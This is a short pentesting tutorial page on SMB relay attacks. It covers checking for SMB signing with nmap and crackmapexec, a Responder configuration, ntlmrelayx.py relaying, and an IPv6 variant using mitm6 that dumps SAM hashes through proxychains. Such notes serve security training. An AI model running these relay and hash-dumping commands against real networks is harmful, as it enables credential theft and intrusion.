SMB Relay
What is SMB relay?
SMB relay attack is just relaying those credentials you capture with responder like, in the LLMNR Poisoning but this time you authenticate with those in other machines.
Requirements
SMB Signing needs to be disabled on target
User must have elevated privileges in the machine, like local admin, domain administrator, member of, and the group etc.
What is SMB Signing?
SMB Signing verify the authenticity and origin of the SMB packets. Prevents SMB MiTM attacks effectively.
Check SMB Signing
You can use Crackmapexec and Nmap to scan the entire network for SMB signing to make much easier the job.
Crackmapexec
Use this command and see the results.
crackmapexec smb <ip-address>
Nmap
Nmap haves a script to verify if SMB is signed or not. Use the following command and see the results.
nmap --script=smb2-security-mode.nse -p 445,139 192.168.64.129 -Pn --open
How to perform the attack (Ipv4)
First, we need to configure the responder, just change SMB and HTTP to Off:
[Responder Core]
; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On
We do not want to respond to these protocols as we will be capturing the hash and relaying it to a different tool called ntlmrelayx.py from Impacket.
Starting responder
sudo python Responder.py -I eth0 -v
Later than, call ntlmrelayx.py:
sudo python ntlmrelayx.py -t 192.168.1.11 -smb2support
SMB Relay using Ipv6
mitm6 -d domain-name.local ntlmrelayx.py -6 -wh <target-ip> -t smb://<target-ip> -socks -debug -smb2support # Once you have credentials with a TRUE status use proxychains to relay the credentials. proxychains cme smb <target-ip> -u <User> -p 'whateveryouwant' -d 'domaincorp' --sam 2>/dev/null
Last updated